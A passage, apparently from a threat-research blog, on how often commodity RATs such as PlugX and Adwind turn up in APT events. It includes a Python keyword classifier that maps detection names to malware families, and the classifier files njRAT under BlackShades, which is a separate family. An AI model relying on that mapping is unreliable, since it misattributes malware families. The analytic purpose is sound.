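To sketch the counting approach: detection names can be matched against the aliases above. The substrings and the example detection name below are assumptions for illustration, not an exhaustive mapping:

# Substrings of Microsoft Defender detection names, mapped to the
# commodity RAT families listed above
FAMILY_ALIASES = {
    'DarkComet':   ('fynloski', 'darkcomet'),
    'BlackShades': ('njrat', 'bladabindi', 'blackshades'),
    'Adwind':      ('adwind',),
    'PlugX':       ('plugx',),
    'PoisonIvy':   ('poison',),
    'XTremeRAT':   ('xtrat', 'xtremerat'),
}

def classify(detection_name):
    # Return the commodity RAT family for a detection name, or None
    lowered = detection_name.lower()
    for family, aliases in FAMILY_ALIASES.items():
        for alias in aliases:
            if alias in lowered:
                return family
    return None

print(classify('Backdoor:Win32/Fynloski.A'))  # DarkComet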

The, so to speak, “lazy king of APTing” is PlugX. The commodity RAT popped up in altogether 15 different events listed in the MISP database.

4_2_plugx

The winner in sample numbers was Adwind, a Java-based RAT dedicated to infecting different platforms. Adwind itself is malware that has been sold under different names, including Frutas RAT and Unrecom RAT. Security firm Fidelis published nice insights on Adwind under the much-appreciated title “RAT in a jar”.

The following graphic shows the total number of RATs and related events found within our data set of 326 events containing 8,927 malware binaries.

4_3_ratpack

In total, we counted that almost a quarter of the inspected events made use of one or another RAT. Looking at the sample set, a ninth of the total set is composed of pre-built RATs. These numbers are rather high, considering that, at least in the heads of analysts, targeted malware is complex and sophisticated.

Still, though, why do we even bother with high numbers of commodity malware? For one, as mentioned before, they help drive down attack costs. Furthermore, they provide functionality that is quite advanced from the start, equipping even unskilled attackers with a Swiss Army knife of malware they couldn’t implement themselves, even if they tried really hard. These do-it-yourself APT tools enable wannabe spies on small budgets, growing the number of potential offenders.

Furthermore, off-the-shelf RATs have been seen in use by certain advanced attackers. They can lead to confusion about the actual offender, as they do not allow for attribution on the basis of the binaries at all. In other words, one would not know whether one is being targeted by a script kiddie or a nation-state actor. Currently, it remains unclear whether commodity RATs have been used deliberately to conceal attribution, but the assumption suggests itself.